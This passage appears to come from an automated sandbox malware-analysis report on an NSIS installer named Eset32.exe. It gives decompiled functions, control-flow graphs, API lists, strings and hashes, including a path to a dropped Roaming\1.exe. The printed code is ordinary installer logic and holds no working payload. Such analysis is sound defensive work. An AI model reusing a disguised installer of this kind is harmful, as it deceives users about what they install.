                                                          • Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: Process$Exit$File$EnvironmentHandlePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCloseCommandCurrentDefaultDeleteDirectoryErrorImageIndirectInfoInitializeLanguageLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeUserValueVersionlstrcmpi
                                                          • String ID: "$"C:\Users\user\Desktop\Eset32.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming$C:\Users\user\Desktop$C:\Users\user\Desktop\Eset32.exe$Error launching installer$Low$NSIS Error$Name Setup$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                          • API String ID: 2959975522-3517791578
                                                          • Opcode ID: 62ed222f1d320cf1e4846f893a456cfa79d0b37c4e8f3d7f84edf936fdc15b3d
                                                          • Instruction ID: 2464a3ec660faf4d6335bd380e0cd13b62da1685a36c15adf6e00eeeb0483762
                                                          • Opcode Fuzzy Hash: 62ed222f1d320cf1e4846f893a456cfa79d0b37c4e8f3d7f84edf936fdc15b3d
                                                          • Instruction Fuzzy Hash: 49C107705047416AD7216F759D89B2F3EACAB4530AF45443FF181BA2E2CB7C8A058B2F
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0040390A Relevance: 45.7, APIs: 14, Strings: 12, Instructions: 215stringregistryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 132 40390a-403922 call 406500 135 403924-40392f GetUserDefaultUILanguage call 406055 132->135 136 403936-403967 call 405fde 132->136 140 403934 135->140 141 403969-40397a call 405fde 136->141 142 40397f-403985 lstrcatA 136->142 143 40398a-4039b3 call 403bcf call 405b7d 140->143 141->142 142->143 149 4039b9-4039be 143->149 150 403a3a-403a42 call 405b7d 143->150 149->150 151 4039c0-4039e4 call 405fde 149->151 156 403a50-403a75 LoadImageA 150->156 157 403a44-403a4b call 40618a 150->157 151->150 160 4039e6-4039e8 151->160 158 403af6-403afe call 40140b 156->158 159 403a77-403aa7 RegisterClassA 156->159 157->156 174 403b00-403b03 158->174 175 403b08-403b13 call 403bcf 158->175 162 403bc5 159->162 163 403aad-403af1 SystemParametersInfoA CreateWindowExA 159->163 165 4039f9-403a05 lstrlenA 160->165 166 4039ea-4039f7 call 405aba 160->166 167 403bc7-403bce 162->167 163->158 168 403a07-403a15 lstrcmpiA 165->168 169 403a2d-403a35 call 405a8f call 4060f7 165->169 166->165 168->169 173 403a17-403a21 GetFileAttributesA 168->173 169->150 177 403a23-403a25 173->177 178 403a27-403a28 call 405ad6 173->178 174->167 184 403b19-403b33 ShowWindow call 406492 175->184 185 403b9c-403ba4 call 4052f0 175->185 177->169 177->178 178->169 192 403b35-403b3a call 406492 184->192 193 403b3f-403b51 GetClassInfoA 184->193 190 403ba6-403bac 185->190 191 403bbe-403bc0 call 40140b 185->191 190->174 196 403bb2-403bb9 call 40140b 190->196 191->162 192->193 194 403b53-403b63 GetClassInfoA RegisterClassA 193->194 195 403b69-403b9a DialogBoxParamA call 40140b call 40385a 193->195 194->195 195->167 196->174
                                                          C-Code - Quality: 96%
                                                          			E0040390A(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t17;
				void* _t25;
				void* _t27;
				int _t28;
				void* _t31;
				int _t34;
				int _t35;
				intOrPtr _t36;
				int _t39;
				char _t57;
				CHAR* _t59;
				signed char _t63;
				signed short _t67;
				CHAR* _t74;
				intOrPtr _t76;
				CHAR* _t81;

				_t76 =  *0x42f434;
				_t17 = E00406500(2);
				_t84 = _t17;
				if(_t17 == 0) {
					_t74 = 0x42a890;
					"1033" = 0x30;
					 *0x436001 = 0x78;
					 *0x436002 = 0;
					E00405FDE(_t71, __eflags, 0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x42a890, 0);
					__eflags =  *0x42a890;
					if(__eflags == 0) {
						E00405FDE(_t71, __eflags, 0x80000003, ".DEFAULT\\Control Panel\\International",  &M0040836A, 0x42a890, 0);
					}
					lstrcatA("1033", _t74);
				} else {
					_t67 =  *_t17(); // executed
					E00406055("1033", _t67 & 0x0000ffff);
				}
				E00403BCF(_t71, _t84);
				 *0x42f4c0 =  *0x42f43c & 0x00000020;
				 *0x42f4dc = 0x10000;
				if(E00405B7D(_t84, 0x435400) != 0) {
					L16:
					if(E00405B7D(_t92, 0x435400) == 0) {
						E0040618A(0, _t74, _t76, 0x435400,  *((intOrPtr*)(_t76 + 0x118)));
					}
					_t25 = LoadImageA( *0x42f420, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x42ec08 = _t25;
					if( *((intOrPtr*)(_t76 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t27 = E00403BCF(_t71, __eflags);
							__eflags =  *0x42f4e0;
							if( *0x42f4e0 != 0) {
								_t28 = E004052F0(_t27, 0);
								__eflags = _t28;
								if(_t28 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42ebec; // 0x0
								if(__eflags == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x42a870, 5);
							_t34 = E00406492("RichEd20");
							__eflags = _t34;
							if(_t34 == 0) {
								E00406492("RichEd32");
							}
							_t81 = "RichEdit20A";
							_t35 = GetClassInfoA(0, _t81, 0x42ebc0);
							__eflags = _t35;
							if(_t35 == 0) {
								GetClassInfoA(0, "RichEdit", 0x42ebc0);
								 *0x42ebe4 = _t81;
								RegisterClassA(0x42ebc0);
							}
							_t36 =  *0x42ec00; // 0x0
							_t39 = DialogBoxParamA( *0x42f420, _t36 + 0x00000069 & 0x0000ffff, 0, E00403CA7, 0);
							E0040385A(E0040140B(5), 1);
							return _t39;
						}
						L22:
						_t31 = 2;
						return _t31;
					} else {
						_t71 =  *0x42f420;
						 *0x42ebc4 = E00401000;
						 *0x42ebd0 =  *0x42f420;
						 *0x42ebd4 = _t25;
						 *0x42ebe4 = 0x40a1f4;
						if(RegisterClassA(0x42ebc0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoA(0x30, 0,  &_v16, 0);
						 *0x42a870 = CreateWindowExA(0x80, 0x40a1f4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42f420, 0);
						goto L21;
					}
				} else {
					_t71 =  *(_t76 + 0x48);
					_t86 = _t71;
					if(_t71 == 0) {
						goto L16;
					}
					_t74 = 0x42e3c0;
					E00405FDE(_t71, _t86,  *((intOrPtr*)(_t76 + 0x44)), _t71,  *((intOrPtr*)(_t76 + 0x4c)) +  *0x42f478, 0x42e3c0, 0);
					_t57 =  *0x42e3c0; // 0x43
					if(_t57 == 0) {
						goto L16;
					}
					if(_t57 == 0x22) {
						_t74 = 0x42e3c1;
						 *((char*)(E00405ABA(0x42e3c1, 0x22))) = 0;
					}
					_t59 = lstrlenA(_t74) + _t74 - 4;
					if(_t59 <= _t74 || lstrcmpiA(_t59, ?str?) != 0) {
						L15:
						E004060F7(0x435400, E00405A8F(_t74));
						goto L16;
					} else {
						_t63 = GetFileAttributesA(_t74);
						if(_t63 == 0xffffffff) {
							L14:
							E00405AD6(_t74);
							goto L15;
						}
						_t92 = _t63 & 0x00000010;
						if((_t63 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}


























                                                          0x00403910
                                                          0x00403919
                                                          0x00403920
                                                          0x00403922
                                                          0x00403936
                                                          0x00403948
                                                          0x0040394f
                                                          0x00403956
                                                          0x0040395c
                                                          0x00403961
                                                          0x00403967
                                                          0x0040397a
                                                          0x0040397a
                                                          0x00403985
                                                          0x00403924
                                                          0x00403924
                                                          0x0040392f
                                                          0x0040392f
                                                          0x0040398a
                                                          0x0040399d
                                                          0x004039a2
                                                          0x004039b3
                                                          0x00403a3a
                                                          0x00403a42
                                                          0x00403a4b
                                                          0x00403a4b
                                                          0x00403a61
                                                          0x00403a67
                                                          0x00403a75
                                                          0x00403af6
                                                          0x00403afe
                                                          0x00403b08
                                                          0x00403b0d
                                                          0x00403b13
                                                          0x00403b9d
                                                          0x00403ba2
                                                          0x00403ba4
                                                          0x00403bc0
                                                          0x00000000
                                                          0x00403bc0
                                                          0x00403ba6
                                                          0x00403bac
                                                          0x00403bb4
                                                          0x00403bb4
                                                          0x00000000
                                                          0x00403bac
                                                          0x00403b21
                                                          0x00403b2c
                                                          0x00403b31
                                                          0x00403b33
                                                          0x00403b3a
                                                          0x00403b3a
                                                          0x00403b45
                                                          0x00403b4d
                                                          0x00403b4f
                                                          0x00403b51
                                                          0x00403b5a
                                                          0x00403b5d
                                                          0x00403b63
                                                          0x00403b63
                                                          0x00403b69
                                                          0x00403b82
                                                          0x00403b93
                                                          0x00000000
                                                          0x00403b98
                                                          0x00403b00
                                                          0x00403b02
                                                          0x00000000
                                                          0x00403a77
                                                          0x00403a77
                                                          0x00403a83
                                                          0x00403a8d
                                                          0x00403a93
                                                          0x00403a98
                                                          0x00403aa7
                                                          0x00403bc5
                                                          0x00403bc5
                                                          0x00000000
                                                          0x00403bc5
                                                          0x00403ab6
                                                          0x00403af1
                                                          0x00000000
                                                          0x00403af1
                                                          0x004039b9
                                                          0x004039b9
                                                          0x004039bc
                                                          0x004039be
                                                          0x00000000
                                                          0x00000000
                                                          0x004039c8
                                                          0x004039d8
                                                          0x004039dd
                                                          0x004039e4
                                                          0x00000000
                                                          0x00000000
                                                          0x004039e8
                                                          0x004039ea
                                                          0x004039f7
                                                          0x004039f7
                                                          0x004039ff
                                                          0x00403a05
                                                          0x00403a2d
                                                          0x00403a35
                                                          0x00000000
                                                          0x00403a17
                                                          0x00403a18
                                                          0x00403a21
                                                          0x00403a27
                                                          0x00403a28
                                                          0x00000000
                                                          0x00403a28
                                                          0x00403a23
                                                          0x00403a25
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00403a25
                                                          0x00403a05

                                                          APIs
                                                            • Part of subcall function 00406500: GetModuleHandleA.KERNEL32(?,?,?,004033BB,0000000B), ref: 00406512
                                                            • Part of subcall function 00406500: GetProcAddress.KERNEL32(00000000,?), ref: 0040652D
                                                          • GetUserDefaultUILanguage.KERNELBASE(00000002,76DDFA90,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Eset32.exe" ,00000000), ref: 00403924
                                                            • Part of subcall function 00406055: wsprintfA.USER32 ref: 00406062
                                                          • lstrcatA.KERNEL32(1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000,00000002,76DDFA90,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Eset32.exe" ,00000000), ref: 00403985
                                                          • lstrlenA.KERNEL32(C:\Users\user\AppData\Roaming\1.exe,?,?,?,C:\Users\user\AppData\Roaming\1.exe,00000000,00435400,1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000,00000002,76DDFA90), ref: 004039FA
                                                          • lstrcmpiA.KERNEL32(?,.exe,C:\Users\user\AppData\Roaming\1.exe,?,?,?,C:\Users\user\AppData\Roaming\1.exe,00000000,00435400,1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000), ref: 00403A0D
                                                          • GetFileAttributesA.KERNEL32(C:\Users\user\AppData\Roaming\1.exe), ref: 00403A18
                                                          • LoadImageA.USER32 ref: 00403A61
                                                          • RegisterClassA.USER32 ref: 00403A9E
                                                          • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403AB6
                                                          • CreateWindowExA.USER32 ref: 00403AEB
                                                          • ShowWindow.USER32(00000005,00000000), ref: 00403B21
                                                          • GetClassInfoA.USER32 ref: 00403B4D
                                                          • GetClassInfoA.USER32 ref: 00403B5A
                                                          • RegisterClassA.USER32 ref: 00403B63
                                                          • DialogBoxParamA.USER32 ref: 00403B82
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                                          • String ID: "C:\Users\user\Desktop\Eset32.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\1.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                          • API String ID: 606308-3954497077
                                                          • Opcode ID: 4865a88281d3660a8db31a6a8141a67bec8b5d5ea2d634c51c2adb987e0e9cb3
                                                          • Instruction ID: 74cd8b4f7d81cde8c77274d740e3983652abf123a0ec58253698c850822a2f16
                                                          • Opcode Fuzzy Hash: 4865a88281d3660a8db31a6a8141a67bec8b5d5ea2d634c51c2adb987e0e9cb3
                                                          • Instruction Fuzzy Hash: EC61A5702402016ED220FB669D46F373ABCEB4474DF50403FF995B62E3DA7DA9068A2D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00402EA1 Relevance: 26.4, APIs: 5, Strings: 10, Instructions: 181memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 205 402ea1-402eef GetTickCount GetModuleFileNameA call 405c90 208 402ef1-402ef6 205->208 209 402efb-402f29 call 4060f7 call 405ad6 call 4060f7 GetFileSize 205->209 210 4030d1-4030d5 208->210 217 403014-403022 call 402e3d 209->217 218 402f2f 209->218 224 403024-403027 217->224 225 403077-40307c 217->225 220 402f34-402f4b 218->220 222 402f4d 220->222 223 402f4f-402f58 call 4032ea 220->223 222->223 230 40307e-403086 call 402e3d 223->230 231 402f5e-402f65 223->231 228 403029-403041 call 403300 call 4032ea 224->228 229 40304b-403075 GlobalAlloc call 403300 call 4030d8 224->229 225->210 228->225 252 403043-403049 228->252 229->225 256 403088-403099 229->256 230->225 234 402fe1-402fe5 231->234 235 402f67-402f7b call 405c4b 231->235 242 402fe7-402fee call 402e3d 234->242 243 402fef-402ff5 234->243 235->243 254 402f7d-402f84 235->254 242->243 247 403004-40300c 243->247 248 402ff7-403001 call 4065b7 243->248 247->220 255 403012 247->255 248->247 252->225 252->229 254->243 258 402f86-402f8d 254->258 255->217 259 4030a1-4030a6 256->259 260 40309b 256->260 258->243 261 402f8f-402f96 258->261 262 4030a7-4030ad 259->262 260->259 261->243 263 402f98-402f9f 261->263 262->262 264 4030af-4030ca SetFilePointer call 405c4b 262->264 263->243 266 402fa1-402fc1 263->266 267 4030cf 264->267 266->225 268 402fc7-402fcb 266->268 267->210 269 402fd3-402fdb 268->269 270 402fcd-402fd1 268->270 269->243 271 402fdd-402fdf 269->271 270->255 270->269 271->243
                                                          C-Code - Quality: 80%
                                                          			E00402EA1(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				long _t43;
				signed int _t50;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				signed int _t65;
				signed int _t70;
				signed int _t71;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				signed int _t85;
				signed int _t87;
				void* _t89;
				signed int _t90;
				signed int _t93;
				intOrPtr* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				_t43 = GetTickCount();
				_t91 = "C:\\Users\\alfons\\Desktop\\Eset32.exe";
				 *0x42f430 = _t43 + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\alfons\\Desktop\\Eset32.exe", 0x400);
				_t89 = E00405C90(_t91, 0x80000000, 3);
				_v16 = _t89;
				 *0x40a018 = _t89;
				if(_t89 == 0xffffffff) {
					return "Error launching installer";
				}
				_t92 = "C:\\Users\\alfons\\Desktop";
				E004060F7("C:\\Users\\alfons\\Desktop", _t91);
				E004060F7(0x437000, E00405AD6(_t92));
				_t50 = GetFileSize(_t89, 0);
				__eflags = _t50;
				 *0x42944c = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00402E3D(1);
					__eflags =  *0x42f438 - _t82;
					if( *0x42f438 == _t82) {
						goto L29;
					}
					__eflags = _v8 - _t82;
					if(_v8 == _t82) {
						L28:
						_t94 = GlobalAlloc(0x40, _v24);
						E00403300( *0x42f438 + 0x1c);
						_push(_v24);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff); // executed
						_t57 = E004030D8(); // executed
						__eflags = _t57 - _v24;
						if(_t57 == _v24) {
							__eflags = _v44 & 0x00000001;
							 *0x42f434 = _t94;
							 *0x42f43c =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x42f440 =  *0x42f440 + 1;
								__eflags =  *0x42f440;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
								__eflags = _t85;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
							 *(_t94 + 0x3c) = _t60;
							E00405C4B(0x42f460, _t94 + 4, 0x40);
							__eflags = 0;
							return 0;
						}
						goto L29;
					}
					E00403300( *0x41d440);
					_t65 = E004032EA( &_a4, 4);
					__eflags = _t65;
					if(_t65 == 0) {
						goto L29;
					}
					__eflags = _v12 - _a4;
					if(_v12 != _a4) {
						goto L29;
					}
					goto L28;
				} else {
					do {
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~( *0x42f438) & 0x00007e00) + 0x200;
						__eflags = _t93 - _t70;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						_t71 = E004032EA(0x415440, _t90);
						__eflags = _t71;
						if(_t71 == 0) {
							E00402E3D(1);
							L29:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x42f438;
						if( *0x42f438 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402E3D(0);
							}
							goto L20;
						}
						E00405C4B( &_v44, 0x415440, 0x1c);
						_t77 = _v44;
						__eflags = _t77 & 0xfffffff0;
						if((_t77 & 0xfffffff0) != 0) {
							goto L20;
						}
						__eflags = _v40 - 0xdeadbeef;
						if(_v40 != 0xdeadbeef) {
							goto L20;
						}
						__eflags = _v28 - 0x74736e49;
						if(_v28 != 0x74736e49) {
							goto L20;
						}
						__eflags = _v32 - 0x74666f73;
						if(_v32 != 0x74666f73) {
							goto L20;
						}
						__eflags = _v36 - 0x6c6c754e;
						if(_v36 != 0x6c6c754e) {
							goto L20;
						}
						_a4 = _a4 | _t77;
						_t87 =  *0x41d440; // 0x3f0998
						 *0x42f4e0 =  *0x42f4e0 | _a4 & 0x00000002;
						_t80 = _v20;
						__eflags = _t80 - _t93;
						 *0x42f438 = _t87;
						if(_t80 > _t93) {
							goto L29;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L16:
							_v8 = _v8 + 1;
							_t24 = _t80 - 4; // 0x40a194
							_t93 = _t24;
							__eflags = _t90 - _t93;
							if(_t90 > _t93) {
								_t90 = _t93;
							}
							goto L20;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L16;
						L20:
						__eflags = _t93 -  *0x42944c; // 0x3f2b9c
						if(__eflags < 0) {
							_v12 = E004065B7(_v12, 0x415440, _t90);
						}
						 *0x41d440 =  *0x41d440 + _t90;
						_t93 = _t93 - _t90;
						__eflags = _t93;
					} while (_t93 != 0);
					_t82 = 0;
					__eflags = 0;
					goto L24;
				}
			}






























                                                          0x00402ea9
                                                          0x00402eac
                                                          0x00402eaf
                                                          0x00402eb2
                                                          0x00402eb8
                                                          0x00402ec9
                                                          0x00402ece
                                                          0x00402ee1
                                                          0x00402ee6
                                                          0x00402ee9
                                                          0x00402eef
                                                          0x00000000
                                                          0x00402ef1
                                                          0x00402efc
                                                          0x00402f02
                                                          0x00402f13
                                                          0x00402f1a
                                                          0x00402f20
                                                          0x00402f22
                                                          0x00402f27
                                                          0x00402f29
                                                          0x00403014
                                                          0x00403016
                                                          0x0040301b
                                                          0x00403022
                                                          0x00000000
                                                          0x00000000
                                                          0x00403024
                                                          0x00403027
                                                          0x0040304b
                                                          0x00403056
                                                          0x00403061
                                                          0x00403066
                                                          0x00403069
                                                          0x0040306a
                                                          0x0040306b
                                                          0x0040306d
                                                          0x00403072
                                                          0x00403075
                                                          0x00403088
                                                          0x0040308c
                                                          0x00403094
                                                          0x00403099
                                                          0x0040309b
                                                          0x0040309b
                                                          0x0040309b
                                                          0x004030a3
                                                          0x004030a3
                                                          0x004030a6
                                                          0x004030a7
                                                          0x004030a7
                                                          0x004030aa
                                                          0x004030ac
                                                          0x004030ac
                                                          0x004030ac
                                                          0x004030b6
                                                          0x004030bc
                                                          0x004030ca
                                                          0x004030cf
                                                          0x00000000
                                                          0x004030cf
                                                          0x00000000
                                                          0x00403075
                                                          0x0040302f
                                                          0x0040303a
                                                          0x0040303f
                                                          0x00403041
                                                          0x00000000
                                                          0x00000000
                                                          0x00403046
                                                          0x00403049
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00402f2f
                                                          0x00402f34
                                                          0x00402f39
                                                          0x00402f3d
                                                          0x00402f44
                                                          0x00402f49
                                                          0x00402f4b
                                                          0x00402f4d
                                                          0x00402f4d
                                                          0x00402f51
                                                          0x00402f56
                                                          0x00402f58
                                                          0x00403080
                                                          0x00403077
                                                          0x00000000
                                                          0x00403077
                                                          0x00402f5e
                                                          0x00402f65
                                                          0x00402fe1
                                                          0x00402fe5
                                                          0x00402fe9
                                                          0x00402fee
                                                          0x00000000
                                                          0x00402fe5
                                                          0x00402f6e
                                                          0x00402f73
                                                          0x00402f76
                                                          0x00402f7b
                                                          0x00000000
                                                          0x00000000
                                                          0x00402f7d
                                                          0x00402f84
                                                          0x00000000
                                                          0x00000000
                                                          0x00402f86
                                                          0x00402f8d
                                                          0x00000000
                                                          0x00000000
                                                          0x00402f8f
                                                          0x00402f96
                                                          0x00000000
                                                          0x00000000
                                                          0x00402f98
                                                          0x00402f9f
                                                          0x00000000
                                                          0x00000000
                                                          0x00402fa1
                                                          0x00402fa7
                                                          0x00402fb0
                                                          0x00402fb6
                                                          0x00402fb9
                                                          0x00402fbb
                                                          0x00402fc1
                                                          0x00000000
                                                          0x00000000
                                                          0x00402fc7
                                                          0x00402fcb
                                                          0x00402fd3
                                                          0x00402fd3
                                                          0x00402fd6
                                                          0x00402fd6
                                                          0x00402fd9
                                                          0x00402fdb
                                                          0x00402fdd
                                                          0x00402fdd
                                                          0x00000000
                                                          0x00402fdb
                                                          0x00402fcd
                                                          0x00402fd1
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00402fef
                                                          0x00402fef
                                                          0x00402ff5
                                                          0x00403001
                                                          0x00403001
                                                          0x00403004
                                                          0x0040300a
                                                          0x0040300a
                                                          0x0040300a
                                                          0x00403012
                                                          0x00403012
                                                          0x00000000
                                                          0x00403012

                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 00402EB2
                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Eset32.exe,00000400), ref: 00402ECE
                                                            • Part of subcall function 00405C90: GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\Eset32.exe,80000000,00000003), ref: 00405C94
                                                            • Part of subcall function 00405C90: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405CB6
                                                          • GetFileSize.KERNEL32(00000000,00000000,00437000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Eset32.exe,C:\Users\user\Desktop\Eset32.exe,80000000,00000003), ref: 00402F1A
                                                          • GlobalAlloc.KERNEL32(00000040,00000020), ref: 00403050
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                          • String ID: "C:\Users\user\Desktop\Eset32.exe" $@TA$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Eset32.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                          • API String ID: 2803837635-1586746597
                                                          • Opcode ID: d2642f5c1e57ff917447350ecc80b65a471f1c26fbd3ec2d1bf2d56bf534e989
                                                          • Instruction ID: b77d5a27d8a3a8735664692b17331c00252a13d20c8f5ee7c59d5cd6c332e3a5
                                                          • Opcode Fuzzy Hash: d2642f5c1e57ff917447350ecc80b65a471f1c26fbd3ec2d1bf2d56bf534e989
                                                          • Instruction Fuzzy Hash: B851E471A00204ABDF20AF64DD85FAF7AB8AB14359F60413BF500B22D1C7B89E858B5D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0040618A Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 199stringCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 272 40618a-406195 273 406197-4061a6 272->273 274 4061a8-4061be 272->274 273->274 275 4061c4-4061cf 274->275 276 4063af-4063b3 274->276 275->276 277 4061d5-4061dc 275->277 278 4061e1-4061eb 276->278 279 4063b9-4063c3 276->279 277->276 278->279 280 4061f1-4061f8 278->280 281 4063c5-4063c9 call 4060f7 279->281 282 4063ce-4063cf 279->282 283 4063a2 280->283 284 4061fe-406232 280->284 281->282 286 4063a4-4063aa 283->286 287 4063ac-4063ae 283->287 288 406238-406242 284->288 289 40634f-406352 284->289 286->276 287->276 290 406244-406248 288->290 291 40625c 288->291 292 406382-406385 289->292 293 406354-406357 289->293 290->291 296 40624a-40624e 290->296 299 406263-40626a 291->299 294 406393-4063a0 lstrlenA 292->294 295 406387-40638e call 40618a 292->295 297 406367-406373 call 4060f7 293->297 298 406359-406365 call 406055 293->298 294->276 295->294 296->291 302 406250-406254 296->302 306 406378-40637e 297->306 298->306 304 40626c-40626e 299->304 305 40626f-406271 299->305 302->291 309 406256-40625a 302->309 304->305 307 406273-406296 call 405fde 305->307 308 4062aa-4062ad 305->308 306->294 311 406380 306->311 320 406336-40633a 307->320 321 40629c-4062a5 call 40618a 307->321 313 4062bd-4062c0 308->313 314 4062af-4062bb GetSystemDirectoryA 308->314 309->299 315 406347-40634d call 4063d2 311->315 318 4062c2-4062d0 GetWindowsDirectoryA 313->318 319 40632d-40632f 313->319 317 406331-406334 314->317 315->294 317->315 317->320 318->319 319->317 322 4062d2-4062dc 319->322 320->315 325 40633c-406342 lstrcatA 320->325 321->317 327 4062f6-40630c SHGetSpecialFolderLocation 322->327 328 4062de-4062e1 322->328 325->315 329 40632a 327->329 330 40630e-406328 SHGetPathFromIDListA CoTaskMemFree 327->330 328->327 332 4062e3-4062ea 328->332 329->319 330->317 330->329 333 4062f2-4062f4 332->333 333->317 333->327
                                                          C-Code - Quality: 72%
                                                          			E0040618A(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				struct _ITEMIDLIST* _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed char _v28;
